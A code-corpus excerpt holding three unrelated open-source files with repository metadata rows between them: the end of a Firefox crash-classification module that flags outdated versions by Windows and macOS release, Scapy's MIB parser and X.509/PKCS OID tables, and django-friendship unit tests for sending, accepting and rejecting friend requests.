'firefox_out_of_date_version' found in the processor configuration"""
#--------------------------------------------------------------------------
def version(self):
return '1.0'
#--------------------------------------------------------------------------
def _predicate(self, raw_crash, processed_crash, processor):
try:
return (
raw_crash.ProductName == 'Firefox'
and normalize(raw_crash.Version) < self.out_of_date_threshold
)
except AttributeError:
self.out_of_date_threshold = normalize(
processor.config.firefox_out_of_date_version
)
return self._predicate(raw_crash, processed_crash, processor)
#--------------------------------------------------------------------------
@staticmethod
def _normalize_windows_version(version_str):
ver_list = version_str.split('.')[:2]
def as_int(x):
try:
return int(x)
except ValueError:
return maxint
# get the first integer out of the last last token
ver_list[-1] = ver_list[-1].split(' ')[0]
ver_list_normalized = [as_int(x) for x in ver_list]
if "Service" in version_str:
try:
# assume last space delimited field is service pack number
ver_list_normalized.append(int(version_str.split(' ')[-1]))
except ValueError: # appears to have been a bad assumption
ver_list_normalized.append(0)
return tuple(ver_list_normalized)
#--------------------------------------------------------------------------
def _windows_action(self, raw_crash, processed_crash, processor):
win_version_normalized = self._normalize_windows_version(
processed_crash["json_dump"]["system_info"]["os_ver"]
)
if win_version_normalized[:2] == (5, 0): # Win2K
return self._add_classification(
processed_crash,
'firefox-no-longer-works-windows-2000',
None,
processor.config.logger
)
elif win_version_normalized < (5, 1, 3): # WinXP SP2
return self._add_classification(
processed_crash,
'firefox-no-longer-works-some-versions-windows-xp',
None,
processor.config.logger
)
return self._add_classification(
processed_crash,
'update-firefox-latest-version',
None,
processor.config.logger
)
#--------------------------------------------------------------------------
@staticmethod
def _normalize_osx_version(version_str):
ver_list = version_str.split('.')[:2]
def as_int(x):
try:
return int(x)
except ValueError:
return maxint
return tuple(as_int(x) for x in ver_list)
#--------------------------------------------------------------------------
def _osx_action(self, raw_crash, processed_crash, processor):
osx_version_normalized = self._normalize_osx_version(
processed_crash["json_dump"]["system_info"]["os_ver"]
)
if (osx_version_normalized <= (10, 4) or
processed_crash["json_dump"]["system_info"]["cpu_arch"] == 'ppc'
):
return self._add_classification(
processed_crash,
'firefox-no-longer-works-mac-os-10-4-or-powerpc',
None,
processor.config.logger
)
elif osx_version_normalized == (10, 5):
return self._add_classification(
processed_crash,
'firefox-no-longer-works-mac-os-x-10-5',
None,
processor.config.logger
)
return self._add_classification(
processed_crash,
'update-firefox-latest-version',
None,
processor.config.logger
)
#--------------------------------------------------------------------------
def _action(self, raw_crash, processed_crash, processor):
crashed_version = normalize(raw_crash.Version)
if "Win" in processed_crash["json_dump"]["system_info"]['os']:
return self._windows_action(raw_crash, processed_crash, processor)
elif processed_crash["json_dump"]["system_info"]['os'] == "Mac OS X":
return self._osx_action(raw_crash, processed_crash, processor)
else:
return self._add_classification(
processed_crash,
'update-firefox-latest-version',
None,
processor.config.logger
)
#------------------------------------------------------------------------------
# the following tuple of tuples is a structure for loading rules into the
# TransformRules system. The tuples take the form:
# predicate_function, predicate_args, predicate_kwargs,
# action_function, action_args, action_kwargs.
#
# The args and kwargs components are additional information that a predicate
# or an action might need to have to do its job. Providing values for args
# or kwargs essentially acts in a manner similar to functools.partial.
# When the predicate or action functions are invoked, these args and kwags
# values will be passed into the function along with the raw_crash,
# processed_crash and processor objects.
default_support_classifier_rules = (
(BitguardClassifier, (), {}, BitguardClassifier, (), {}),
(OutOfDateClassifier, (), {}, OutOfDateClassifier, (), {}),
)
| mpl-2.0 | 4,439,334,082,690,474,000 | 42.376812 | 79 | 0.522285 | false |
guedou/scapy-python2.5 | scapy/asn1/mib.py | 6 | 28459 | ## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <[email protected]>
## Modified by Maxence Tury <[email protected]>
## This program is published under a GPLv2 license
"""
Management Information Base (MIB) parsing
"""
import re
from glob import glob
from scapy.dadict import DADict,fixname
from scapy.config import conf
from scapy.utils import do_graph
#################
## MIB parsing ##
#################
_mib_re_integer = re.compile("^[0-9]+$")
_mib_re_both = re.compile("^([a-zA-Z_][a-zA-Z0-9_-]*)\(([0-9]+)\)$")
_mib_re_oiddecl = re.compile("$\s*([a-zA-Z0-9_-]+)\s+OBJECT([^:\{\}]|\{[^:]+\})+::=\s*\{([^\}]+)\}",re.M)
_mib_re_strings = re.compile('"[^"]*"')
_mib_re_comments = re.compile('--.*(\r|\n)')
class MIBDict(DADict):
def _findroot(self, x):
if x.startswith("."):
x = x[1:]
if not x.endswith("."):
x += "."
max=0
root="."
for k in self.iterkeys():
if x.startswith(self[k]+"."):
if max < len(self[k]):
max = len(self[k])
root = k
return root, x[max:-1]
def _oidname(self, x):
root,remainder = self._findroot(x)
return root+remainder
def _oid(self, x):
xl = x.strip(".").split(".")
p = len(xl)-1
while p >= 0 and _mib_re_integer.match(xl[p]):
p -= 1
if p != 0 or xl[p] not in self:
return x
xl[p] = self[xl[p]]
return ".".join(xl[p:])
def _make_graph(self, other_keys=None, **kargs):
if other_keys is None:
other_keys = []
nodes = [(k, self[k]) for k in self.iterkeys()]
oids = [self[k] for k in self.iterkeys()]
for k in other_keys:
if k not in oids:
nodes.append(self.oidname(k),k)
s = 'digraph "mib" {\n\trankdir=LR;\n\n'
for k,o in nodes:
s += '\t"%s" [ label="%s" ];\n' % (o,k)
s += "\n"
for k,o in nodes:
parent,remainder = self._findroot(o[:-1])
remainder = remainder[1:]+o[-1]
if parent != ".":
parent = self[parent]
s += '\t"%s" -> "%s" [label="%s"];\n' % (parent, o,remainder)
s += "}\n"
do_graph(s, **kargs)
def __len__(self):
return len(self.keys())
def mib_register(ident, value, the_mib, unresolved):
if ident in the_mib or ident in unresolved:
return ident in the_mib
resval = []
not_resolved = 0
for v in value:
if _mib_re_integer.match(v):
resval.append(v)
else:
v = fixname(v)
if v not in the_mib:
not_resolved = 1
if v in the_mib:
v = the_mib[v]
elif v in unresolved:
v = unresolved[v]
if type(v) is list:
resval += v
else:
resval.append(v)
if not_resolved:
unresolved[ident] = resval
return False
else:
the_mib[ident] = resval
keys = unresolved.keys()
i = 0
while i < len(keys):
k = keys[i]
if mib_register(k,unresolved[k], the_mib, {}):
del(unresolved[k])
del(keys[i])
i = 0
else:
i += 1
return True
def load_mib(filenames):
the_mib = {'iso': ['1']}
unresolved = {}
for k in conf.mib.iterkeys():
mib_register(k, conf.mib[k].split("."), the_mib, unresolved)
if type(filenames) is str:
filenames = [filenames]
for fnames in filenames:
for fname in glob(fnames):
f = open(fname)
text = f.read()
cleantext = " ".join(_mib_re_strings.split(" ".join(_mib_re_comments.split(text))))
for m in _mib_re_oiddecl.finditer(cleantext):
gr = m.groups()
ident,oid = gr[0],gr[-1]
ident=fixname(ident)
oid = oid.split()
for i, elt in enumerate(oid):
m = _mib_re_both.match(elt)
if m:
oid[i] = m.groups()[1]
mib_register(ident, oid, the_mib, unresolved)
newmib = MIBDict(_name="MIB")
for k,o in the_mib.iteritems():
newmib[k]=".".join(o)
for k,o in unresolved.iteritems():
newmib[k]=".".join(o)
conf.mib=newmib
####################
## OID references ##
####################
####### pkcs1 #######
pkcs1_oids = {
"rsaEncryption" : "1.2.840.113549.1.1.1",
"md2WithRSAEncryption" : "1.2.840.113549.1.1.2",
"md4WithRSAEncryption" : "1.2.840.113549.1.1.3",
"md5WithRSAEncryption" : "1.2.840.113549.1.1.4",
"sha1-with-rsa-signature" : "1.2.840.113549.1.1.5",
"rsaOAEPEncryptionSET" : "1.2.840.113549.1.1.6",
"id-RSAES-OAEP" : "1.2.840.113549.1.1.7",
"id-mgf1" : "1.2.840.113549.1.1.8",
"id-pSpecified" : "1.2.840.113549.1.1.9",
"rsassa-pss" : "1.2.840.113549.1.1.10",
"sha256WithRSAEncryption" : "1.2.840.113549.1.1.11",
"sha384WithRSAEncryption" : "1.2.840.113549.1.1.12",
"sha512WithRSAEncryption" : "1.2.840.113549.1.1.13",
"sha224WithRSAEncryption" : "1.2.840.113549.1.1.14"
}
####### pkcs9 #######
pkcs9_oids = {
"modules" : "1.2.840.113549.1.9.0",
"emailAddress" : "1.2.840.113549.1.9.1",
"unstructuredName" : "1.2.840.113549.1.9.2",
"contentType" : "1.2.840.113549.1.9.3",
"messageDigest" : "1.2.840.113549.1.9.4",
"signing-time" : "1.2.840.113549.1.9.5",
"countersignature" : "1.2.840.113549.1.9.6",
"challengePassword" : "1.2.840.113549.1.9.7",
"unstructuredAddress" : "1.2.840.113549.1.9.8",
"extendedCertificateAttributes" : "1.2.840.113549.1.9.9",
"signingDescription" : "1.2.840.113549.1.9.13",
"extensionRequest" : "1.2.840.113549.1.9.14",
"smimeCapabilities" : "1.2.840.113549.1.9.15",
"smime" : "1.2.840.113549.1.9.16",
"pgpKeyID" : "1.2.840.113549.1.9.17",
"friendlyName" : "1.2.840.113549.1.9.20",
"localKeyID" : "1.2.840.113549.1.9.21",
"certTypes" : "1.2.840.113549.1.9.22",
"crlTypes" : "1.2.840.113549.1.9.23",
"pkcs-9-oc" : "1.2.840.113549.1.9.24",
"pkcs-9-at" : "1.2.840.113549.1.9.25",
"pkcs-9-sx" : "1.2.840.113549.1.9.26",
"pkcs-9-mr" : "1.2.840.113549.1.9.27",
"id-aa-CMSAlgorithmProtection" : "1.2.840.113549.1.9.52"
}
####### x509 #######
attributeType_oids = {
"objectClass" : "2.5.4.0",
"aliasedEntryName" : "2.5.4.1",
"knowledgeInformation" : "2.5.4.2",
"commonName" : "2.5.4.3",
"surname" : "2.5.4.4",
"serialNumber" : "2.5.4.5",
"countryName" : "2.5.4.6",
"localityName" : "2.5.4.7",
"stateOrProvinceName" : "2.5.4.8",
"streetAddress" : "2.5.4.9",
"organizationName" : "2.5.4.10",
"organizationUnitName" : "2.5.4.11",
"title" : "2.5.4.12",
"description" : "2.5.4.13",
"searchGuide" : "2.5.4.14",
"businessCategory" : "2.5.4.15",
"postalAddress" : "2.5.4.16",
"postalCode" : "2.5.4.17",
"postOfficeBox" : "2.5.4.18",
"physicalDeliveryOfficeName" : "2.5.4.19",
"telephoneNumber" : "2.5.4.20",
"telexNumber" : "2.5.4.21",
"teletexTerminalIdentifier" : "2.5.4.22",
"facsimileTelephoneNumber" : "2.5.4.23",
"x121Address" : "2.5.4.24",
"internationalISDNNumber" : "2.5.4.25",
"registeredAddress" : "2.5.4.26",
"destinationIndicator" : "2.5.4.27",
"preferredDeliveryMethod" : "2.5.4.28",
"presentationAddress" : "2.5.4.29",
"supportedApplicationContext" : "2.5.4.30",
"member" : "2.5.4.31",
"owner" : "2.5.4.32",
"roleOccupant" : "2.5.4.33",
"seeAlso" : "2.5.4.34",
"userPassword" : "2.5.4.35",
"userCertificate" : "2.5.4.36",
"cACertificate" : "2.5.4.37",
"authorityRevocationList" : "2.5.4.38",
"certificateRevocationList" : "2.5.4.39",
"crossCertificatePair" : "2.5.4.40",
"name" : "2.5.4.41",
"givenName" : "2.5.4.42",
"initials" : "2.5.4.43",
"generationQualifier" : "2.5.4.44",
"uniqueIdentifier" : "2.5.4.45",
"dnQualifier" : "2.5.4.46",
"enhancedSearchGuide" : "2.5.4.47",
"protocolInformation" : "2.5.4.48",
"distinguishedName" : "2.5.4.49",
"uniqueMember" : "2.5.4.50",
"houseIdentifier" : "2.5.4.51",
"supportedAlgorithms" : "2.5.4.52",
"deltaRevocationList" : "2.5.4.53",
"dmdName" : "2.5.4.54",
"clearance" : "2.5.4.55",
"defaultDirQop" : "2.5.4.56",
"attributeIntegrityInfo" : "2.5.4.57",
"attributeCertificate" : "2.5.4.58",
"attributeCertificateRevocationList": "2.5.4.59",
"confKeyInfo" : "2.5.4.60",
"aACertificate" : "2.5.4.61",
"attributeDescriptorCertificate" : "2.5.4.62",
"attributeAuthorityRevocationList" : "2.5.4.63",
"family-information" : "2.5.4.64",
"pseudonym" : "2.5.4.65",
"communicationsService" : "2.5.4.66",
"communicationsNetwork" : "2.5.4.67",
"certificationPracticeStmt" : "2.5.4.68",
"certificatePolicy" : "2.5.4.69",
"pkiPath" : "2.5.4.70",
"privPolicy" : "2.5.4.71",
"role" : "2.5.4.72",
"delegationPath" : "2.5.4.73",
"protPrivPolicy" : "2.5.4.74",
"xMLPrivilegeInfo" : "2.5.4.75",
"xmlPrivPolicy" : "2.5.4.76",
"uuidpair" : "2.5.4.77",
"tagOid" : "2.5.4.78",
"uiiFormat" : "2.5.4.79",
"uiiInUrh" : "2.5.4.80",
"contentUrl" : "2.5.4.81",
"permission" : "2.5.4.82",
"uri" : "2.5.4.83",
"pwdAttribute" : "2.5.4.84",
"userPwd" : "2.5.4.85",
"urn" : "2.5.4.86",
"url" : "2.5.4.87",
"utmCoordinates" : "2.5.4.88",
"urnC" : "2.5.4.89",
"uii" : "2.5.4.90",
"epc" : "2.5.4.91",
"tagAfi" : "2.5.4.92",
"epcFormat" : "2.5.4.93",
"epcInUrn" : "2.5.4.94",
"ldapUrl" : "2.5.4.95",
"ldapUrl" : "2.5.4.96",
"organizationIdentifier" : "2.5.4.97"
}
certificateExtension_oids = {
"authorityKeyIdentifier" : "2.5.29.1",
"keyAttributes" : "2.5.29.2",
"certificatePolicies" : "2.5.29.3",
"keyUsageRestriction" : "2.5.29.4",
"policyMapping" : "2.5.29.5",
"subtreesConstraint" : "2.5.29.6",
"subjectAltName" : "2.5.29.7",
"issuerAltName" : "2.5.29.8",
"subjectDirectoryAttributes" : "2.5.29.9",
"basicConstraints" : "2.5.29.10",
"subjectKeyIdentifier" : "2.5.29.14",
"keyUsage" : "2.5.29.15",
"privateKeyUsagePeriod" : "2.5.29.16",
"subjectAltName" : "2.5.29.17",
"issuerAltName" : "2.5.29.18",
"basicConstraints" : "2.5.29.19",
"cRLNumber" : "2.5.29.20",
"reasonCode" : "2.5.29.21",
"expirationDate" : "2.5.29.22",
"instructionCode" : "2.5.29.23",
"invalidityDate" : "2.5.29.24",
"cRLDistributionPoints" : "2.5.29.25",
"issuingDistributionPoint" : "2.5.29.26",
"deltaCRLIndicator" : "2.5.29.27",
"issuingDistributionPoint" : "2.5.29.28",
"certificateIssuer" : "2.5.29.29",
"nameConstraints" : "2.5.29.30",
"cRLDistributionPoints" : "2.5.29.31",
"certificatePolicies" : "2.5.29.32",
"policyMappings" : "2.5.29.33",
"policyConstraints" : "2.5.29.34",
"authorityKeyIdentifier" : "2.5.29.35",
"policyConstraints" : "2.5.29.36",
"extKeyUsage" : "2.5.29.37",
"authorityAttributeIdentifier" : "2.5.29.38",
"roleSpecCertIdentifier" : "2.5.29.39",
"cRLStreamIdentifier" : "2.5.29.40",
"basicAttConstraints" : "2.5.29.41",
"delegatedNameConstraints" : "2.5.29.42",
"timeSpecification" : "2.5.29.43",
"cRLScope" : "2.5.29.44",
"statusReferrals" : "2.5.29.45",
"freshestCRL" : "2.5.29.46",
"orderedList" : "2.5.29.47",
"attributeDescriptor" : "2.5.29.48",
"userNotice" : "2.5.29.49",
"sOAIdentifier" : "2.5.29.50",
"baseUpdateTime" : "2.5.29.51",
"acceptableCertPolicies" : "2.5.29.52",
"deltaInfo" : "2.5.29.53",
"inhibitAnyPolicy" : "2.5.29.54",
"targetInformation" : "2.5.29.55",
"noRevAvail" : "2.5.29.56",
"acceptablePrivilegePolicies" : "2.5.29.57",
"id-ce-toBeRevoked" : "2.5.29.58",
"id-ce-RevokedGroups" : "2.5.29.59",
"id-ce-expiredCertsOnCRL" : "2.5.29.60",
"indirectIssuer" : "2.5.29.61",
"id-ce-noAssertion" : "2.5.29.62",
"id-ce-aAissuingDistributionPoint" : "2.5.29.63",
"id-ce-issuedOnBehaIFOF" : "2.5.29.64",
"id-ce-singleUse" : "2.5.29.65",
"id-ce-groupAC" : "2.5.29.66",
"id-ce-allowedAttAss" : "2.5.29.67",
"id-ce-attributeMappings" : "2.5.29.68",
"id-ce-holderNameConstraints" : "2.5.29.69"
}
certExt_oids = {
"cert-type" : "2.16.840.1.113730.1.1",
"base-url" : "2.16.840.1.113730.1.2",
"revocation-url" : "2.16.840.1.113730.1.3",
"ca-revocation-url" : "2.16.840.1.113730.1.4",
"ca-crl-url" : "2.16.840.1.113730.1.5",
"ca-cert-url" : "2.16.840.1.113730.1.6",
"renewal-url" : "2.16.840.1.113730.1.7",
"ca-policy-url" : "2.16.840.1.113730.1.8",
"homepage-url" : "2.16.840.1.113730.1.9",
"entity-logo" : "2.16.840.1.113730.1.10",
"user-picture" : "2.16.840.1.113730.1.11",
"ssl-server-name" : "2.16.840.1.113730.1.12",
"comment" : "2.16.840.1.113730.1.13",
"lost-password-url" : "2.16.840.1.113730.1.14",
"cert-renewal-time" : "2.16.840.1.113730.1.15",
"aia" : "2.16.840.1.113730.1.16",
"cert-scope-of-use" : "2.16.840.1.113730.1.17",
}
certPkixPe_oids = {
"authorityInfoAccess" : "1.3.6.1.5.5.7.1.1",
"biometricInfo" : "1.3.6.1.5.5.7.1.2",
"qcStatements" : "1.3.6.1.5.5.7.1.3",
"auditIdentity" : "1.3.6.1.5.5.7.1.4",
"aaControls" : "1.3.6.1.5.5.7.1.6",
"proxying" : "1.3.6.1.5.5.7.1.10",
"subjectInfoAccess" : "1.3.6.1.5.5.7.1.11"
}
certPkixQt_oids = {
"cps" : "1.3.6.1.5.5.7.2.1",
"unotice" : "1.3.6.1.5.5.7.2.2"
}
certPkixKp_oids = {
"serverAuth" : "1.3.6.1.5.5.7.3.1",
"clientAuth" : "1.3.6.1.5.5.7.3.2",
"codeSigning" : "1.3.6.1.5.5.7.3.3",
"emailProtection" : "1.3.6.1.5.5.7.3.4",
"ipsecEndSystem" : "1.3.6.1.5.5.7.3.5",
"ipsecTunnel" : "1.3.6.1.5.5.7.3.6",
"ipsecUser" : "1.3.6.1.5.5.7.3.7",
"timeStamping" : "1.3.6.1.5.5.7.3.8",
"ocspSigning" : "1.3.6.1.5.5.7.3.9",
"dvcs" : "1.3.6.1.5.5.7.3.10",
"secureShellClient" : "1.3.6.1.5.5.7.3.21",
"secureShellServer" : "1.3.6.1.5.5.7.3.22"
}
certPkixAd_oids = {
"ocsp" : "1.3.6.1.5.5.7.48.1",
"caIssuers" : "1.3.6.1.5.5.7.48.2",
"timestamping" : "1.3.6.1.5.5.7.48.3",
"id-ad-dvcs" : "1.3.6.1.5.5.7.48.4",
"id-ad-caRepository" : "1.3.6.1.5.5.7.48.5",
"id-pkix-ocsp-archive-cutoff" : "1.3.6.1.5.5.7.48.6",
"id-pkix-ocsp-service-locator" : "1.3.6.1.5.5.7.48.7",
"id-ad-cmc" : "1.3.6.1.5.5.7.48.12"
}
####### ansi-x962 #######
x962KeyType_oids = {
"prime-field" : "1.2.840.10045.1.1",
"characteristic-two-field" : "1.2.840.10045.1.2",
"ecPublicKey" : "1.2.840.10045.2.1",
}
x962Signature_oids = {
"ecdsa-with-SHA1" : "1.2.840.10045.4.1",
"ecdsa-with-Recommended" : "1.2.840.10045.4.2",
"ecdsa-with-SHA224" : "1.2.840.10045.4.3.1",
"ecdsa-with-SHA256" : "1.2.840.10045.4.3.2",
"ecdsa-with-SHA384" : "1.2.840.10045.4.3.3",
"ecdsa-with-SHA512" : "1.2.840.10045.4.3.4"
}
####### elliptic curves #######
certicomCurve_oids = {
"ansit163k1" : "1.3.132.0.1",
"ansit163r1" : "1.3.132.0.2",
"ansit239k1" : "1.3.132.0.3",
"sect113r1" : "1.3.132.0.4",
"sect113r2" : "1.3.132.0.5",
"secp112r1" : "1.3.132.0.6",
"secp112r2" : "1.3.132.0.7",
"ansip160r1" : "1.3.132.0.8",
"ansip160k1" : "1.3.132.0.9",
"ansip256k1" : "1.3.132.0.10",
"ansit163r2" : "1.3.132.0.15",
"ansit283k1" : "1.3.132.0.16",
"ansit283r1" : "1.3.132.0.17",
"sect131r1" : "1.3.132.0.22",
"ansit193r1" : "1.3.132.0.24",
"ansit193r2" : "1.3.132.0.25",
"ansit233k1" : "1.3.132.0.26",
"ansit233r1" : "1.3.132.0.27",
"secp128r1" : "1.3.132.0.28",
"secp128r2" : "1.3.132.0.29",
"ansip160r2" : "1.3.132.0.30",
"ansip192k1" : "1.3.132.0.31",
"ansip224k1" : "1.3.132.0.32",
"ansip224r1" : "1.3.132.0.33",
"ansip384r1" : "1.3.132.0.34",
"ansip521r1" : "1.3.132.0.35",
"ansit409k1" : "1.3.132.0.36",
"ansit409r1" : "1.3.132.0.37",
"ansit571k1" : "1.3.132.0.38",
"ansit571r1" : "1.3.132.0.39"
}
####### policies #######
certPolicy_oids = {
"anyPolicy" : "2.5.29.32.0"
}
# from Chromium source code (ev_root_ca_metadata.cc)
evPolicy_oids = {
"EV AC Camerfirma S.A. Chambers of Commerce Root - 2008" : "1.3.6.1.4.1.17326.10.14.2.1.2",
"EV AC Camerfirma S.A. Chambers of Commerce Root - 2008" : "1.3.6.1.4.1.17326.10.14.2.2.2",
"EV AC Camerfirma S.A. Global Chambersign Root - 2008" : "1.3.6.1.4.1.17326.10.8.12.1.2",
"EV AC Camerfirma S.A. Global Chambersign Root - 2008" : "1.3.6.1.4.1.17326.10.8.12.2.2",
"EV AddTrust/Comodo/USERTrust" : "1.3.6.1.4.1.6449.1.2.1.5.1",
"EV AddTrust External CA Root" : "1.3.6.1.4.1.782.1.2.1.8.1",
"EV Actualis Authentication Root CA" : "1.3.159.1.17.1",
"EV AffirmTrust Commercial" : "1.3.6.1.4.1.34697.2.1",
"EV AffirmTrust Networking" : "1.3.6.1.4.1.34697.2.2",
"EV AffirmTrust Premium" : "1.3.6.1.4.1.34697.2.3",
"EV AffirmTrust Premium ECC" : "1.3.6.1.4.1.34697.2.4",
"EV Autoridad de Certificacion Firmaprofesional CIF A62634068" : "1.3.6.1.4.1.13177.10.1.3.10",
"EV Baltimore CyberTrust Root" : "1.3.6.1.4.1.6334.1.100.1",
"EV Buypass Class 3" : "2.16.578.1.26.1.3.3",
"EV Certificate Authority of WoSign" : "1.3.6.1.4.1.36305.2",
"EV CertPlus Class 2 Primary CA (KEYNECTIS)" : "1.3.6.1.4.1.22234.2.5.2.3.1",
"EV Certum Trusted Network CA" : "1.2.616.1.113527.2.5.1.1",
"EV China Internet Network Information Center EV Certificates Root" : "1.3.6.1.4.1.29836.1.10",
"EV Cybertrust Global Root" : "1.3.6.1.4.1.6334.1.100.1",
"EV DigiCert High Assurance EV Root CA" : "2.16.840.1.114412.2.1",
"EV D-TRUST Root Class 3 CA 2 EV 2009" : "1.3.6.1.4.1.4788.2.202.1",
"EV Entrust Certification Authority" : "2.16.840.1.114028.10.1.2",
"EV Equifax Secure Certificate Authority (GeoTrust)" : "1.3.6.1.4.1.14370.1.6",
"EV E-Tugra Certification Authority" : "2.16.792.3.0.4.1.1.4",
"EV GeoTrust Primary Certification Authority" : "1.3.6.1.4.1.14370.1.6",
"EV GlobalSign Root CAs" : "1.3.6.1.4.1.4146.1.1",
"EV Go Daddy Certification Authority" : "2.16.840.1.114413.1.7.23.3",
"EV Izenpe.com roots Business" : "1.3.6.1.4.1.14777.6.1.1",
"EV Izenpe.com roots Government" : "1.3.6.1.4.1.14777.6.1.2",
"EV Network Solutions Certificate Authority" : "1.3.6.1.4.1.781.1.2.1.8.1",
"EV QuoVadis Roots" : "1.3.6.1.4.1.8024.0.2.100.1.2",
"EV SecureTrust Corporation Roots" : "2.16.840.1.114404.1.1.2.4.1",
"EV Security Communication RootCA1" : "1.2.392.200091.100.721.1",
"EV Staat der Nederlanden EV Root CA" : "2.16.528.1.1003.1.2.7",
"EV StartCom Certification Authority" : "1.3.6.1.4.1.23223.1.1.1",
"EV Starfield Certificate Authority" : "2.16.840.1.114414.1.7.23.3",
"EV Starfield Service Certificate Authority" : "2.16.840.1.114414.1.7.24.3",
"EV SwissSign Gold CA - G2" : "2.16.756.1.89.1.2.1.1",
"EV Swisscom Root EV CA 2" : "2.16.756.1.83.21.0",
"EV thawte CAs" : "2.16.840.1.113733.1.7.48.1",
"EV TWCA Roots" : "1.3.6.1.4.1.40869.1.1.22.3",
"EV T-Telessec GlobalRoot Class 3" : "1.3.6.1.4.1.7879.13.24.1",
"EV USERTrust Certification Authorities" : "1.3.6.1.4.1.6449.1.2.1.5.1",
"EV ValiCert Class 2 Policy Validation Authority" : "2.16.840.1.114413.1.7.23.3",
"EV VeriSign Certification Authorities" : "2.16.840.1.113733.1.7.23.6",
"EV Wells Fargo WellsSecure Public Root Certification Authority" : "2.16.840.1.114171.500.9",
"EV XRamp Global Certification Authority" : "2.16.840.1.114404.1.1.2.4.1",
"jurisdictionOfIncorporationLocalityName" : "1.3.6.1.4.1.311.60.2.1.1",
"jurisdictionOfIncorporationStateOrProvinceName" : "1.3.6.1.4.1.311.60.2.1.2",
"jurisdictionOfIncorporationCountryName" : "1.3.6.1.4.1.311.60.2.1.3"
}
x509_oids_sets = [
pkcs1_oids,
pkcs9_oids,
attributeType_oids,
certificateExtension_oids,
certExt_oids,
certPkixPe_oids,
certPkixQt_oids,
certPkixKp_oids,
certPkixAd_oids,
certPolicy_oids,
evPolicy_oids,
x962KeyType_oids,
x962Signature_oids,
certicomCurve_oids
]
x509_oids = {}
for oids_set in x509_oids_sets:
x509_oids.update(oids_set)
conf.mib = MIBDict(_name="MIB", **x509_oids)
| gpl-2.0 | 3,225,902,543,449,037,300 | 49.015817 | 110 | 0.398995 | false |
teury/django-friendship | friendship/tests/tests.py | 2 | 21163 | import os
from django.contrib.auth.models import User
from django.core.cache import cache
from django.core.exceptions import ValidationError
from django.db import IntegrityError
from django.core.urlresolvers import reverse
from django.test import TestCase
from friendship.exceptions import AlreadyExistsError
from friendship.models import Friend, Follow, FriendshipRequest
TEST_TEMPLATES = os.path.join(os.path.dirname(__file__), 'templates')
class login(object):
def __init__(self, testcase, user, password):
self.testcase = testcase
success = testcase.client.login(username=user, password=password)
self.testcase.assertTrue(
success,
"login with username=%r, password=%r failed" % (user, password)
)
def __enter__(self):
pass
def __exit__(self, *args):
self.testcase.client.logout()
class BaseTestCase(TestCase):
def setUp(self):
"""
Setup some initial users
"""
self.user_pw = 'test'
self.user_bob = self.create_user('bob', '[email protected]', self.user_pw)
self.user_steve = self.create_user('steve', '[email protected]', self.user_pw)
self.user_susan = self.create_user('susan', '[email protected]', self.user_pw)
self.user_amy = self.create_user('amy', '[email protected]', self.user_pw)
cache.clear()
def tearDown(self):
cache.clear()
self.client.logout()
def login(self, user, password):
return login(self, user, password)
def create_user(self, username, password, email_address):
user = User.objects.create_user(username, password, email_address)
return user
def assertResponse200(self, response):
self.assertEqual(response.status_code, 200)
def assertResponse302(self, response):
self.assertEqual(response.status_code, 302)
def assertResponse403(self, response):
self.assertEqual(response.status_code, 403)
def assertResponse404(self, response):
self.assertEqual(response.status_code, 404)
class FriendshipModelTests(BaseTestCase):
def test_friendship_request(self):
### Bob wants to be friends with Steve
req1 = Friend.objects.add_friend(self.user_bob, self.user_steve)
# Ensure neither have friends already
self.assertEqual(Friend.objects.friends(self.user_bob), [])
self.assertEqual(Friend.objects.friends(self.user_steve), [])
# Ensure FriendshipRequest is created
self.assertEqual(FriendshipRequest.objects.filter(from_user=self.user_bob).count(), 1)
self.assertEqual(FriendshipRequest.objects.filter(to_user=self.user_steve).count(), 1)
self.assertEqual(Friend.objects.unread_request_count(self.user_steve), 1)
# Ensure the proper sides have requests or not
self.assertEqual(len(Friend.objects.requests(self.user_bob)), 0)
self.assertEqual(len(Friend.objects.requests(self.user_steve)), 1)
self.assertEqual(len(Friend.objects.sent_requests(self.user_bob)), 1)
self.assertEqual(len(Friend.objects.sent_requests(self.user_steve)), 0)
self.assertEqual(len(Friend.objects.unread_requests(self.user_steve)), 1)
self.assertEqual(Friend.objects.unread_request_count(self.user_steve), 1)
self.assertEqual(len(Friend.objects.rejected_requests(self.user_steve)), 0)
self.assertEqual(len(Friend.objects.unrejected_requests(self.user_steve)), 1)
self.assertEqual(Friend.objects.unrejected_request_count(self.user_steve), 1)
# Ensure they aren't friends at this point
self.assertFalse(Friend.objects.are_friends(self.user_bob, self.user_steve))
# Accept the request
req1.accept()
# Ensure neither have pending requests
self.assertEqual(FriendshipRequest.objects.filter(from_user=self.user_bob).count(), 0)
self.assertEqual(FriendshipRequest.objects.filter(to_user=self.user_steve).count(), 0)
# Ensure both are in each other's friend lists
self.assertEqual(Friend.objects.friends(self.user_bob), [self.user_steve])
self.assertEqual(Friend.objects.friends(self.user_steve), [self.user_bob])
self.assertTrue(Friend.objects.are_friends(self.user_bob, self.user_steve))
# Make sure we can remove friendship
self.assertTrue(Friend.objects.remove_friend(self.user_bob, self.user_steve))
self.assertFalse(Friend.objects.are_friends(self.user_bob, self.user_steve))
self.assertFalse(Friend.objects.remove_friend(self.user_bob, self.user_steve))
# Susan wants to be friends with Amy, but cancels it
req2 = Friend.objects.add_friend(self.user_susan, self.user_amy)
self.assertEqual(Friend.objects.friends(self.user_susan), [])
self.assertEqual(Friend.objects.friends(self.user_amy), [])
req2.cancel()
self.assertEqual(Friend.objects.requests(self.user_susan), [])
self.assertEqual(Friend.objects.requests(self.user_amy), [])
# Susan wants to be friends with Amy, but Amy rejects it
req3 = Friend.objects.add_friend(self.user_susan, self.user_amy)
self.assertEqual(Friend.objects.friends(self.user_susan), [])
self.assertEqual(Friend.objects.friends(self.user_amy), [])
req3.reject()
# Duplicated requests raise a more specific subclass of IntegrityError.
with self.assertRaises(IntegrityError):
Friend.objects.add_friend(self.user_susan, self.user_amy)
with self.assertRaises(AlreadyExistsError):
Friend.objects.add_friend(self.user_susan, self.user_amy)
self.assertFalse(Friend.objects.are_friends(self.user_susan, self.user_amy))
self.assertEqual(len(Friend.objects.rejected_requests(self.user_amy)), 1)
self.assertEqual(len(Friend.objects.rejected_requests(self.user_amy)), 1)
# let's try that again..
req3.delete()
# Susan wants to be friends with Amy, and Amy reads it
req4 = Friend.objects.add_friend(self.user_susan, self.user_amy)
req4.mark_viewed()
self.assertFalse(Friend.objects.are_friends(self.user_susan, self.user_amy))
